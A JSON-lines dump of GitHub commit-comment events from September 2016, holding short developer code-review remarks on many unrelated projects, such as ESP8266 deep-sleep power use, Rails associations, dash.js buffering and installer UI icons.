{"id":"4591276819","type":"CommitCommentEvent","actor":{"login":"X-Ryl669"},"repo":{"name":"X-Ryl669/wifi_display"},"payload":{"comment":{"id":19100779,"position":null,"line":null,"path":null,"commit_id":"0dc18c913191e6037ba3ededcd39074a95d04284","created_at":"2016-09-20T17:45:02Z","updated_at":"2016-09-20T17:45:02Z","body":"IMHO measuring a small current is not what you want, you actually want to measure (average) energy consumption. Using a battery (or a super capacitor) for this measurement is simple low tech way to do it. Measure the battery drain, and you'll get the average consumption of your system.\r\n\r\n> That way I could certify whether I'm actually in deep sleep.\r\n\r\nThat part is very easy. You have a SW watchdog you can disable and a HW watchdog you can not. Whenever it triggers, the ESP reset (so you can see this happens over the serial line). Disable the SW watchdog, put a `while(1) ;` and watch the ESP reboot at regular interval ~30s due to HW watchdog (you also have the \"reboot\" reason in a register to check for it that say it rebooted due to wd).\r\nPut a deep_sleep and then a while(1) just after, you'll see the ESP does not reboot anymore, and when it does after your sleep time, the \"reboot\" reason is \"deep sleep\".\r\n\r\n> BTW, what happens if I have a timer scheduled and I try to go into deep sleep? Will it just wake me when the timer is due?\r\n\r\nWhen the system is in deep sleep, it's virtually dead. Only the RTC is running (the CPU, radio and all other peripheral are halted) and when the sleep timer reach 0, it assert some GPIO down that should be connected to the RST line. \r\nSo neither the software nor hardware timer will wake you up. \r\nHowever, if you have a timer registered, the OS will not enter the deep sleep (why ? I'm not 100% sure, just observed the behavior). So, my change does this, it unregister the timer, and replace it by a call to a function going to sleep, so it's being called by the OS. The system takes some time to go to sleep (during that time, you can still send few bytes to the serial port, that's cool for debugging) and then it's dead\r\n\r\nI'm not a big fan of a battery in the system (because, well, it bothers me to having to charge it anyway, whatever the period), so I plugged it on a power plug. I've a power meter and the consumption on the electrical outlet is 0.6W. Usually the conversion efficiency of the 230V to USB adapter is around 70% when running at 2.5W output, since it consume 3.5W on the power meter when charging my phone. \r\n\r\nGiven that the lower current consumption will increase the loss of efficiency, let's say it's only 50%, then the system consume 0.3W for me on average (maybe less if the adapter is very bad). That's 24h on the 7.2Wh battery you have. My update rate is 10mn during the day and 30mn during the night (but the picture generation on the server takes 2s at least, because it's quite complex with image processing and so on).\r\n\r\nIn terms of real money, 0.6W is ~60 cents per year on my power bill here in France, so it's well worth it compared to having to un-hang from the wall to charge it from time to time.\r\n"}},"created_at":"2016-09-20T17:45:02Z"}
{"id":"4591277234","type":"CommitCommentEvent","actor":{"login":"fmrmx"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19100781,"position":null,"line":null,"path":null,"commit_id":"f07fe63e50062941dd99ce719f27f6d09ecfbd7d","created_at":"2016-09-20T17:45:06Z","updated_at":"2016-09-20T17:45:06Z","body":"Yes Jackpoz im new.\r\n\r\nYou said, If you want your server not to crash then make sure Wintergrasp.Enable is set to 0\r\n\r\nWith GridUnload disabled, Wintergrasp runs perfect for me, no errors, is safe to cherry pick this commit?"}},"created_at":"2016-09-20T17:45:06Z"}
{"id":"4591282553","type":"CommitCommentEvent","actor":{"login":"vanfstd"},"repo":{"name":"snabbco/snabb"},"payload":{"comment":{"id":19100795,"position":95,"line":178,"path":"src/lib/ipsec/esp.lua","commit_id":"fa01474c430dbf938feda5d5df7775b377b14fe2","created_at":"2016-09-20T17:45:59Z","updated_at":"2016-09-20T17:45:59Z","body":"I don't think the details of resync should be exposed to the user any further than letting them control the pertinent tunables (threshold/attempts, maybe additionally enable/disable resync altogether). \r\nWouldn't simplicity of the app be preferrable over simplicity of the backend?\r\nAlso, it feels like this is going to be difficult to document in a clear way since it requires knowledge about what's actually happening in ESP, conceptually (\"decapsulate ...\") and specific to this implementation (\"... p into p_out\")"}},"created_at":"2016-09-20T17:45:59Z"}
{"id":"4591285606","type":"CommitCommentEvent","actor":{"login":"potatowagon"},"repo":{"name":"potatowagon/addressbook-level3"},"payload":{"comment":{"id":19100807,"position":null,"line":null,"path":null,"commit_id":"9fcec932b1e3b79d2d7ab945b90fc3ad04e38b22","created_at":"2016-09-20T17:46:29Z","updated_at":"2016-09-20T17:46:29Z","body":"Is it better to place abstract class Storage in seedu.addressbook.logic package or in seedu.addressbook.storage package? "}},"created_at":"2016-09-20T17:46:29Z"}
{"id":"4591288836","type":"CommitCommentEvent","actor":{"login":"gromakovsky"},"repo":{"name":"serokell/time-warp"},"payload":{"comment":{"id":19100826,"position":22,"line":46,"path":"src/Control/TimeWarp/Logging.hs","commit_id":"ef678b91fd8fd511170a4590fe656a0b05eee7d4","created_at":"2016-09-20T17:47:05Z","updated_at":"2016-09-20T17:47:05Z","body":"See #global channel in slack."}},"created_at":"2016-09-20T17:47:05Z"}
{"id":"4591292061","type":"CommitCommentEvent","actor":{"login":"sjeeva"},"repo":{"name":"sjeeva/docker-birthday-3"},"payload":{"comment":{"id":19100834,"position":5,"line":6,"path":"example-voting-app/docker-compose.yml","commit_id":"1029e97582fc70ebd80f5b04448428d60cce95e1","created_at":"2016-09-20T17:47:35Z","updated_at":"2016-09-20T17:47:35Z","body":"see the possibility of parameterizing organization name "}},"created_at":"2016-09-20T17:47:35Z"}
{"id":"4591292279","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"Arshev/rails"},"payload":{"comment":{"id":19100835,"position":4,"line":4,"path":"tutu/app/models/ticket.rb","commit_id":"d8d7e28fabf97149a36365902302d1512fd479cf","created_at":"2016-09-20T17:47:37Z","updated_at":"2016-09-20T17:47:37Z","body":"У тебя нет в таблице полей departure_station_id и arrival_station_id, т.к. ты добавил поле railway_station_id"}},"created_at":"2016-09-20T17:47:37Z"}
{"id":"4591294117","type":"CommitCommentEvent","actor":{"login":"chittattoo"},"repo":{"name":"gunyarakun/Framework7"},"payload":{"comment":{"id":19100847,"position":null,"line":null,"path":null,"commit_id":"cad37237e6eabd55a7ae31f69f62207f6993d48c","created_at":"2016-09-20T17:47:55Z","updated_at":"2016-09-20T17:47:55Z","body":"Good"}},"created_at":"2016-09-20T17:47:55Z"}
{"id":"4591297643","type":"CommitCommentEvent","actor":{"login":"chittattoo"},"repo":{"name":"gunyarakun/Framework7"},"payload":{"comment":{"id":19100854,"position":5,"line":102,"path":"src/js/views.js","commit_id":"cad37237e6eabd55a7ae31f69f62207f6993d48c","created_at":"2016-09-20T17:48:31Z","updated_at":"2016-09-20T17:48:31Z","body":"http://framework7.io"}},"created_at":"2016-09-20T17:48:31Z"}
{"id":"4591298353","type":"CommitCommentEvent","actor":{"login":"ebaydayz"},"repo":{"name":"EpochModTeam/DayZ-Epoch"},"payload":{"comment":{"id":19100858,"position":46,"line":95,"path":"SQF/dayz_server/compile/server_updateObject.sqf","commit_id":"ae78fde0675241b91fed7acd6fc46d9c701b99d4","created_at":"2016-09-20T17:48:39Z","updated_at":"2016-09-20T17:48:39Z","body":"We had these as str because format has a 2048 character limit in A2 which inventory can exceed.\r\nhttps://community.bistudio.com/wiki/format\r\n\r\nI changed it back in e2c2a2a\r\n"}},"created_at":"2016-09-20T17:48:39Z"}
{"id":"4591300594","type":"CommitCommentEvent","actor":{"login":"A1ve5"},"repo":{"name":"CSC-IT-Center-for-Science/ansible-role-arc-frontend"},"payload":{"comment":{"id":19100871,"position":4,"line":132,"path":"defaults/main.yml","commit_id":"202a5558eb8088be15eaa83201be1116b5ed6ddc","created_at":"2016-09-20T17:49:02Z","updated_at":"2016-09-20T17:49:02Z","body":"yes, I want to make sure sites apply it \n\n> From: \"Johan Guldmyr\" <notifications@github.com>\n> To: \"CSC-IT-Center-for-Science/ansible-role-arc-frontend\"\n> <ansible-role-arc-frontend@noreply.github.com>\n> Cc: \"Luis Sequeira Alves\" <luis.alves@csc.fi>, \"Author\"\n> <author@noreply.github.com>\n> Sent: Tuesday, 20 September, 2016 16:55:49\n> Subject: Re: [CSC-IT-Center-for-Science/ansible-role-arc-frontend] Setting Slurm\n> fairshare (202a555)\n\n> Any special reason why this is on by default and not like some other tasks in\n> this role (like add_slurm_accts) - enabled on demand by setting variables when\n> running ansible-playbook?\n\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub , or mute the thread .\n\n-- \nLuís Alves \n\nSystem Specialist . CORE Group \nFinnish Grid and Cloud Infrastucture (FGCI) . NGI_FI @ EGI \nCSC - IT Center for Science, Ltd. . FINLAND \nPhone: +358 (0) 503 812 519 . http://www.csc.fi \n"}},"created_at":"2016-09-20T17:49:02Z"}
{"id":"4591301191","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"Arshev/rails"},"payload":{"comment":{"id":19100873,"position":3,"line":3,"path":"tutu/db/migrate/20160920165946_add_derture_and_arrival_station_id_to_tickets.rb","commit_id":"d8d7e28fabf97149a36365902302d1512fd479cf","created_at":"2016-09-20T17:49:09Z","updated_at":"2016-09-20T17:49:09Z","body":"Такая конструкция добавит поле railway_station_id, а нам нужно другие поля добавить. add_belongs_to используем, когда совпадает название ассоциации и поля, но в нашем случае этот не так, поэтому надо в явном виде добавить нужные поля типа integer через add_column. \r\nСделай так:  откати миграцию, измени ее и снова примени."}},"created_at":"2016-09-20T17:49:09Z"}
{"id":"4591303356","type":"CommitCommentEvent","actor":{"login":"spiterikevin"},"repo":{"name":"Dash-Industry-Forum/dash.js"},"payload":{"comment":{"id":19100877,"position":null,"line":null,"path":null,"commit_id":"e6091fde74dcaf76920623a58fb515494455bdf7","created_at":"2016-09-20T17:49:30Z","updated_at":"2016-09-20T17:49:30Z","body":"This was a minor improvement in the implementation to improve stability with low buffer levels.\r\n\r\nThe algorithm in the paper pauses until the buffer level would indicate bolaQuality instead of (bolaQuality + 1), i.e. the score for bolaQuality >= the score for (bolaQuality + 1). (Note: I'm using 0 as the index for the lowest quality as in dash.js, in the paper 0 is the index for the highest quality.)\r\n\r\nThe algorithm as implemented in dash.js pauses until the score for bolaQuality >= 0, irrespective of the score for (bolaQuality + 1). This change reduces the delay and allows for a larger buffer level.\r\n\r\nOne of the reasons for this change was that in dash.js the maximum buffer level is usually rather low (around 12s), and when using the original delay the buffer level was getting too low. This was causing issues as the buffer wasn't absorbing temporary small drops in bandwidth.\r\n\r\nAs a side note, the new fast switching heuristic in dash.js enables larger buffers. Previously dash.js was limited to very low buffer sizes (about 12s) to avoid having a large buffer (say 30s) full of low-quality fragments which are played out even if the bandwidth suddenly improves and allows for high-quality fragments. With fast switching any low-quality fragments in the buffer can be replaced, so the main problem of having a larger buffer size is eliminated. Bola in dash.js doesn't yet interact well with the fast switching heuristic, but I'm working on a fix which should be ready soon."}},"created_at":"2016-09-20T17:49:30Z"}
{"id":"4591305377","type":"CommitCommentEvent","actor":{"login":"dgasmith"},"repo":{"name":"jturney/psi4"},"payload":{"comment":{"id":19100886,"position":24,"line":1794,"path":"psi4/share/psi4/python/driver.py","commit_id":"d3df4402c85c4e8b42f26511f5f41587bfef5081","created_at":"2016-09-20T17:49:51Z","updated_at":"2016-09-20T17:49:51Z","body":"Too much C, fortunately doesnt effect Python. Removed."}},"created_at":"2016-09-20T17:49:51Z"}
{"id":"4591305784","type":"CommitCommentEvent","actor":{"login":"oberon2007"},"repo":{"name":"calamares/calamares"},"payload":{"comment":{"id":19100887,"position":null,"line":null,"path":null,"commit_id":"d45a6bd856b0d741b796d9c53e6de83b620407fb","created_at":"2016-09-20T17:49:55Z","updated_at":"2016-09-20T17:49:55Z","body":"The intuitive thing for me would be that the button displays the action that is to be expected when I press it. So I think the unpressed button must show arrow down :smile: "}},"created_at":"2016-09-20T17:49:55Z"}
{"id":"4591308337","type":"CommitCommentEvent","actor":{"login":"nowseemee"},"repo":{"name":"mkkp/invalid-voter"},"payload":{"comment":{"id":19100893,"position":6,"line":6,"path":"save.php","commit_id":"256a314deabe4b97ec00418394802a670fa6dd58","created_at":"2016-09-20T17:50:19Z","updated_at":"2016-09-20T17:50:19Z","body":"u can do the same with jquery, client_id is a public key"}},"created_at":"2016-09-20T17:50:19Z"}
{"id":"4591309547","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"Arshev/rails"},"payload":{"comment":{"id":19100898,"position":9,"line":5,"path":"tutu/app/models/railway_station.rb","commit_id":"d8d7e28fabf97149a36365902302d1512fd479cf","created_at":"2016-09-20T17:50:32Z","updated_at":"2016-09-20T17:50:32Z","body":"У тебя станция в билете может быть либо станцией отправления, либо станцией прибытия. Нужно явно указать ассоцаиции has_many по какому полю связываться - departure_station_id или arrival_station_id. Для этого также надо указать опцию foreign_key."}},"created_at":"2016-09-20T17:50:32Z"}
{"id":"4591312409","type":"CommitCommentEvent","actor":{"login":"oberon2007"},"repo":{"name":"calamares/calamares"},"payload":{"comment":{"id":19100906,"position":null,"line":null,"path":null,"commit_id":"d45a6bd856b0d741b796d9c53e6de83b620407fb","created_at":"2016-09-20T17:51:01Z","updated_at":"2016-09-20T17:51:01Z","body":"Same as when you have a cancel-button that is showing a cross, right?"}},"created_at":"2016-09-20T17:51:01Z"}
{"id":"4591315133","type":"CommitCommentEvent","actor":{"login":"linuxcaffe"},"repo":{"name":"tbabej/task"},"payload":{"comment":{"id":19100914,"position":null,"line":null,"path":null,"commit_id":"83bc27c41f4757b75fb6d1be96fa32944d26692f","created_at":"2016-09-20T17:51:28Z","updated_at":"2016-09-20T17:51:28Z","body":"is this fix in any way available outside of this commit? as a patch? as an add-on?"}},"created_at":"2016-09-20T17:51:28Z"}
{"id":"4591319090","type":"CommitCommentEvent","actor":{"login":"oberon2007"},"repo":{"name":"calamares/calamares"},"payload":{"comment":{"id":19100927,"position":null,"line":null,"path":null,"commit_id":"d45a6bd856b0d741b796d9c53e6de83b620407fb","created_at":"2016-09-20T17:52:07Z","updated_at":"2016-09-20T17:52:07Z","body":"an unpressed pause-button will always show the pause-symbol and while it's pressed it will show \"play\"."}},"created_at":"2016-09-20T17:52:07Z"}
{"id":"4591326172","type":"CommitCommentEvent","actor":{"login":"raffitz"},"repo":{"name":"colobas/colobas.github.io.code"},"payload":{"comment":{"id":19100955,"position":26,"line":37,"path":"about.md","commit_id":"e8fc7fb7700377f45b0cd6b0254ab2192f053476","created_at":"2016-09-20T17:53:20Z","updated_at":"2016-09-20T17:53:20Z","body":"O link está mal. Falta o 8D no final (isto é, devia ser `[PGP Public key](https://pgp.mit.edu/pks/lookup?op=get&search=0xEC7C6ED633FB288D)` ).\r\n\r\nJá que tens uma chave PGP, bem que podias começar a assinar os commits. ([Signing commits using GPG](https://help.github.com/articles/signing-commits-using-gpg/))."}},"created_at":"2016-09-20T17:53:20Z"}
{"id":"4591326229","type":"CommitCommentEvent","actor":{"login":"Jhno591"},"repo":{"name":"Jhno591/Citra"},"payload":{"comment":{"id":19100956,"position":null,"line":null,"path":null,"commit_id":"d27b378420e1bb904b525667c936a727153d20dd","created_at":"2016-09-20T17:53:20Z","updated_at":"2016-09-20T17:53:20Z","body":"..."}},"created_at":"2016-09-20T17:53:20Z"}
{"id":"4591326614","type":"CommitCommentEvent","actor":{"login":"araina1"},"repo":{"name":"araina1/Blocbox-Code"},"payload":{"comment":{"id":19100960,"position":null,"line":null,"path":null,"commit_id":"a296d9e7267ea9987837d60fe7e84b09a34fb0cc","created_at":"2016-09-20T17:53:25Z","updated_at":"2016-09-20T17:53:25Z","body":"Checkpoint-27-completed"}},"created_at":"2016-09-20T17:53:25Z"}
{"id":"4591329140","type":"CommitCommentEvent","actor":{"login":"tillig"},"repo":{"name":"dotnetjunkie/Mvc"},"payload":{"comment":{"id":19100973,"position":26,"line":26,"path":"src/Microsoft.AspNetCore.Mvc/ApplicationBuilderExtensions.cs","commit_id":"89957e06349ddc3a45977ff19c18d7087ebc6503","created_at":"2016-09-20T17:53:50Z","updated_at":"2016-09-20T17:53:50Z","body":"I imagined that the place you were trying to get to was a way to replace all the things that _were_ using the conforming container with things that instead used the specific container. Which is to say, very similar to the way the previous Web API stuff worked, but even further in that direction - all pluggable factories, all pluggable creators/releasers.\r\n\r\nIf that's not the ultimate goal - the ability to _wholly_ replace the conforming container interface with a separate set of factories - then, as they say, \"I'm out.\"\r\n\r\nI think you and I understand \"the whole idea around the Conforming Container\" as different things. I've always felt like the conforming container was about lowest-common-denominator feature support and the design decisions that result from introducing one of these interfaces. I don't agree that it has anything to do with separate containers that handle framework and application, respectively.\r\n\r\nI've fought this dual-container thing a lot in the past. A _lot_. I ran into some [insane challenges with an extreme version this in Identity Server 3](https://github.com/IdentityServer/IdentityServer3/issues/2117) which caused a lot of extra code to work around. I'm totally disinterested in trying to get the MVC guys to somehow allow us to introduce two (or more) containers into a single pipeline.\r\n\r\nOn the other hand, if you are looking to get us to a place where we can replace the composition root(s) through the app such that you can avoid the conforming container entirely, _that_ I can support."}},"created_at":"2016-09-20T17:53:50Z"}
{"id":"4591329738","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/chromium"},"payload":{"comment":{"id":19100974,"position":null,"line":null,"path":null,"commit_id":"cac28735a950d5d2dbdc5f2e4aec3d100d30f726","created_at":"2016-09-20T17:53:55Z","updated_at":"2016-09-20T17:53:55Z","body":"++"}},"created_at":"2016-09-20T17:53:55Z"}
{"id":"4591335215","type":"CommitCommentEvent","actor":{"login":"leorochael"},"repo":{"name":"nilshamerlinck/odoo"},"payload":{"comment":{"id":19100995,"position":null,"line":null,"path":null,"commit_id":"7f9c57d693fec050bbaf64ca8c74cd69132997b9","created_at":"2016-09-20T17:54:53Z","updated_at":"2016-09-20T17:54:53Z","body":"Hi, @nilshamerlinck, have you considered adding a PR for this into Odoo itself and into OCB?"}},"created_at":"2016-09-20T17:54:53Z"}
{"id":"4591336535","type":"CommitCommentEvent","actor":{"login":"StommePoes"},"repo":{"name":"Pearson-Higher-Ed/slider"},"payload":{"comment":{"id":19101006,"position":5,"line":1,"path":"demo/demo.js","commit_id":"b99185e0f1c6edd6d930f57e95ec93c3cf8261f0","created_at":"2016-09-20T17:55:06Z","updated_at":"2016-09-20T17:55:06Z","body":"Don't we rename these to our Thingie name? import MySlider from ../main?"}},"created_at":"2016-09-20T17:55:06Z"}
{"id":"4591338840","type":"CommitCommentEvent","actor":{"login":"dzsubek"},"repo":{"name":"mkkp/invalid-voter"},"payload":{"comment":{"id":19101010,"position":6,"line":6,"path":"save.php","commit_id":"256a314deabe4b97ec00418394802a670fa6dd58","created_at":"2016-09-20T17:55:27Z","updated_at":"2016-09-20T17:55:27Z","body":"Thanks, I will check it (maybe) tonight but if you have free time feel free\nto contribute ;)\nOn 2016. Sep 20., Tue at 19:50, Daniel Beck <notifications@github.com>\nwrote:\n\n> u can do the same with jquery, client_id is a public key\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/mkkp/invalid-voter/commit/256a314deabe4b97ec00418394802a670fa6dd58#commitcomment-19100893>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ADlt8MQlFgqUaKXqIAISceC60AlA3UuAks5qsBzcgaJpZM4KB7Ae>\n> .\n>\n"}},"created_at":"2016-09-20T17:55:27Z"}
{"id":"4591344193","type":"CommitCommentEvent","actor":{"login":"aekeus"},"repo":{"name":"brave/windows-installer"},"payload":{"comment":{"id":19101020,"position":null,"line":null,"path":null,"commit_id":"1febf37c0c9fe368895c9a887a3c8f32ef6187ab","created_at":"2016-09-20T17:56:22Z","updated_at":"2016-09-20T17:56:22Z","body":"Right, will revert that change."}},"created_at":"2016-09-20T17:56:22Z"}
{"id":"4591344689","type":"CommitCommentEvent","actor":{"login":"B--B"},"repo":{"name":"AOSP-JF-MM/platform_device_samsung_jflte"},"payload":{"comment":{"id":19101023,"position":null,"line":null,"path":null,"commit_id":"0cfb340e06f709eea2483a561c8a12add223a160","created_at":"2016-09-20T17:56:27Z","updated_at":"2016-09-20T17:56:27Z","body":"I'm uploading the test build on our dp, but i think VZW it's still completely broken, will take a look later that variant.. USC and CDMA may work but must be tested.. And in every case someone after the boot (CDMA and USC) must run restorecon -vR /system/ in a root shell with system rw and send me the output of the command, because i don't know if there are other file with missing context, i haven't time to check yet"}},"created_at":"2016-09-20T17:56:27Z"}
{"id":"4591347914","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":19101036,"position":null,"line":null,"path":null,"commit_id":"0601f8bd557ff6aa7ae646881c6fadcc2aade8ca","created_at":"2016-09-20T17:56:59Z","updated_at":"2016-09-20T17:56:59Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#YK1Ay_O-Qf6InAgwapJaGg"}},"created_at":"2016-09-20T17:56:59Z"}
{"id":"4591351899","type":"CommitCommentEvent","actor":{"login":"ktdreyer"},"repo":{"name":"cbodley/ceph"},"payload":{"comment":{"id":19101057,"position":null,"line":null,"path":null,"commit_id":"381605e34a44edb9acfcfb5a56bd598b020e022f","created_at":"2016-09-20T17:57:37Z","updated_at":"2016-09-20T17:57:37Z","body":"good idea @badone \r\n\r\nUnfortunately this got merged a while back. We'll just have to watch for this in the future."}},"created_at":"2016-09-20T17:57:37Z"}
{"id":"4591353278","type":"CommitCommentEvent","actor":{"login":"AlexFalappa"},"repo":{"name":"AlexFalappa/nb-springboot"},"payload":{"comment":{"id":19101065,"position":4,"line":24,"path":"src/main/resources/com/github/alexfalappa/nbspringboot/projects/initializr/Bundle.properties","commit_id":"06eebedb4fa5b18507b419c6e287d00ce57da436","created_at":"2016-09-20T17:57:50Z","updated_at":"2016-09-20T17:57:50Z","body":"@snicoll, with regard to the format I simply followed your recommendations on the wiki (https://github.com/spring-io/initializr/wiki/Metadata-format).\r\n\r\nAs you can see from this commit the user agent string is externalized and fully configurable on my side. "}},"created_at":"2016-09-20T17:57:50Z"}
{"id":"4591360836","type":"CommitCommentEvent","actor":{"login":"PELock"},"repo":{"name":"MattDiesel/Ault"},"payload":{"comment":{"id":19101101,"position":null,"line":null,"path":null,"commit_id":"dce4b6627d724ec20a58c03c93c16b364d320fcc","created_at":"2016-09-20T17:58:57Z","updated_at":"2016-09-20T17:58:57Z","body":"Still throwing errors\r\n\r\n`Local Enum $eVar1, $eVar2, $eVar3`\r\n\r\n```\r\nTr1\r\nTr2\r\n\"C:\\Users\\...\\Ault-master\\ault\\Deparser.au3\" (103) : ==> Array variable has incorrect number of subscripts or subscript dimension range exceeded.:\r\n$sOut &= \"Step \" & $aSplit[1] & $aSplit[2] & \" \"\r\n$sOut &= \"Step \" & $aSplit[1] & ^ ERROR\r\n```"}},"created_at":"2016-09-20T17:58:57Z"}
{"id":"4591360898","type":"CommitCommentEvent","actor":{"login":"zverok"},"repo":{"name":"devico/learning-ruby"},"payload":{"comment":{"id":19101102,"position":9,"line":14,"path":"country_filter.rb","commit_id":"ad57f80fb71af8d84aa01a9a71870eaec11344cf","created_at":"2016-09-20T17:58:58Z","updated_at":"2016-09-20T17:58:58Z","body":"Но ведь можно в одну строчку?.."}},"created_at":"2016-09-20T17:58:58Z"}
{"id":"4591362877","type":"CommitCommentEvent","actor":{"login":"ZanderBrown"},"repo":{"name":"gunyarakun/Framework7"},"payload":{"comment":{"id":19101110,"position":5,"line":102,"path":"src/js/views.js","commit_id":"cad37237e6eabd55a7ae31f69f62207f6993d48c","created_at":"2016-09-20T17:59:16Z","updated_at":"2016-09-20T17:59:16Z","body":"what about it?"}},"created_at":"2016-09-20T17:59:16Z"}
{"id":"4591367958","type":"CommitCommentEvent","actor":{"login":"cybrann"},"repo":{"name":"cooler-SAI/JadeCore548-patched"},"payload":{"comment":{"id":19101137,"position":null,"line":null,"path":null,"commit_id":"efe0b244e4d65889ee08909d1a49847bf5bb8f9e","created_at":"2016-09-20T18:00:06Z","updated_at":"2016-09-20T18:00:06Z","body":"Hmm, maybe, because I took that gobject from other source"}},"created_at":"2016-09-20T18:00:06Z"}
{"id":"4591370325","type":"CommitCommentEvent","actor":{"login":"luis-pereira"},"repo":{"name":"pvanek/qlipper"},"payload":{"comment":{"id":19101147,"position":null,"line":null,"path":null,"commit_id":"0862db2ecd029cf3482d05f66efab311b3f3725b","created_at":"2016-09-20T18:00:27Z","updated_at":"2016-09-20T18:00:27Z","body":"@palinek This is really great. I've tried it in the past but there were problems with the apt addons."}},"created_at":"2016-09-20T18:00:27Z"}
{"id":"4591374129","type":"CommitCommentEvent","actor":{"login":"zverok"},"repo":{"name":"devico/learning-ruby"},"payload":{"comment":{"id":19101175,"position":18,"line":22,"path":"country_filter.rb","commit_id":"ad57f80fb71af8d84aa01a9a71870eaec11344cf","created_at":"2016-09-20T18:01:02Z","updated_at":"2016-09-20T18:01:02Z","body":"Норм! Хотя некоторые предпочли бы (дело личного вкуса, но обрати внимание на такой вариант) написать так:\r\n\r\n```ruby\r\nreturn super if  method_name =~ /(\\?|\\.|\\=)$/ # идите к чорту, этот вариант нам неприемлем!\r\n@collect.select { |c| c.country.include?(method_name.to_s.upcase) } # реальная работа\r\n```\r\n\r\nАргументы можно придумать в защиту обоих вариантов, но знать что «так тоже делают» — стоит ;)"}},"created_at":"2016-09-20T18:01:02Z"}
{"id":"4591376948","type":"CommitCommentEvent","actor":{"login":"unboxme"},"repo":{"name":"unboxme/LRSmartTextField"},"payload":{"comment":{"id":19101195,"position":5,"line":65,"path":"LRTextField/LRTextField.m","commit_id":"a304e02aeb06524ae73daac9b98b745f269a68be","created_at":"2016-09-20T18:01:27Z","updated_at":"2016-09-20T18:01:27Z","body":"Yes, it was a quick fix for my usage case.\r\nYou are right too. BTW, you can set it from IB. I'll find better solution later."}},"created_at":"2016-09-20T18:01:27Z"}
{"id":"4591378718","type":"CommitCommentEvent","actor":{"login":"hmert"},"repo":{"name":"ojs/ojs"},"payload":{"comment":{"id":19101203,"position":null,"line":null,"path":null,"commit_id":"f9df269de2f51d5cdfe932c5ac230d23842d30f8","created_at":"2016-09-20T18:01:45Z","updated_at":"2016-09-20T18:01:45Z","body":"it should place in `/bin` directory without `.sh` extension"}},"created_at":"2016-09-20T18:01:45Z"}
{"id":"4591378961","type":"CommitCommentEvent","actor":{"login":"oberon2007"},"repo":{"name":"calamares/calamares"},"payload":{"comment":{"id":19101205,"position":null,"line":null,"path":null,"commit_id":"d45a6bd856b0d741b796d9c53e6de83b620407fb","created_at":"2016-09-20T18:01:48Z","updated_at":"2016-09-20T18:01:48Z","body":"What would also make sense to me is to simply use arrow-down.png all the time. Then it will just be switched on or off, indicated by button showing pressed or unpressed."}},"created_at":"2016-09-20T18:01:48Z"}
{"id":"4591380477","type":"CommitCommentEvent","actor":{"login":"ravigamer95"},"repo":{"name":"ravigamer95/Logic"},"payload":{"comment":{"id":19101209,"position":null,"line":null,"path":null,"commit_id":"dd04655e3d3f02c72155f5c9babf84c62b88047b","created_at":"2016-09-20T18:02:02Z","updated_at":"2016-09-20T18:02:02Z","body":"@udkreddy Yeah here is the link bro : **[http://s12.postimg.org/qmud6wjd9/block_diag.png](url)** "}},"created_at":"2016-09-20T18:02:02Z"}
{"id":"4591380683","type":"CommitCommentEvent","actor":{"login":"FernBch"},"repo":{"name":"AOSP-JF-MM/platform_device_samsung_jflte"},"payload":{"comment":{"id":19101210,"position":null,"line":null,"path":null,"commit_id":"0cfb340e06f709eea2483a561c8a12add223a160","created_at":"2016-09-20T18:02:03Z","updated_at":"2016-09-20T18:02:03Z","body":"Understood"}},"created_at":"2016-09-20T18:02:03Z"}
{"id":"4591384592","type":"CommitCommentEvent","actor":{"login":"dlorenc"},"repo":{"name":"GoogleCloudPlatform/runtimes-common"},"payload":{"comment":{"id":19101219,"position":null,"line":null,"path":null,"commit_id":"a7971e981b43c1433bb70e01ecf284e6985d22a7","created_at":"2016-09-20T18:02:41Z","updated_at":"2016-09-20T18:02:41Z","body":"Ah, you shouldn't need to escape them since they don't match the outer quotes. This should work fine:\r\n\r\n```\r\nprint \"Hello, 'world'!\"\r\nHello, 'world'!\r\n```\r\n"}},"created_at":"2016-09-20T18:02:41Z"}
{"id":"4591386669","type":"CommitCommentEvent","actor":{"login":"St4rk"},"repo":{"name":"St4rk/nightmare-fiction"},"payload":{"comment":{"id":19101223,"position":94,"line":76,"path":"game/mainmenu/mainMenu.cpp","commit_id":"5d27378eb243762efecc69f3eb45d9fcd9d0b883","created_at":"2016-09-20T18:03:00Z","updated_at":"2016-09-20T18:03:00Z","body":"Sim, eu tava fazendo um teste, tava com um bug na hora de renderizar texto, fiquei mudando e esqueci de voltar pra NEW GAME hah, obrigado"}},"created_at":"2016-09-20T18:03:00Z"}
{"id":"4591388948","type":"CommitCommentEvent","actor":{"login":"jarun"},"repo":{"name":"jarun/Buku"},"payload":{"comment":{"id":19101232,"position":null,"line":null,"path":null,"commit_id":"ac76b5ae01f5c7e0bb9eb72ace169dae3cdafac8","created_at":"2016-09-20T18:03:21Z","updated_at":"2016-09-20T18:03:21Z","body":"@wheresmyjetpack crash and burn it! ;)"}},"created_at":"2016-09-20T18:03:21Z"}
{"id":"4591389229","type":"CommitCommentEvent","actor":{"login":"mhomolak"},"repo":{"name":"Pearson-Higher-Ed/slider"},"payload":{"comment":{"id":19101234,"position":5,"line":1,"path":"demo/demo.js","commit_id":"b99185e0f1c6edd6d930f57e95ec93c3cf8261f0","created_at":"2016-09-20T18:03:24Z","updated_at":"2016-09-20T18:03:24Z","body":"Fixed"}},"created_at":"2016-09-20T18:03:24Z"}
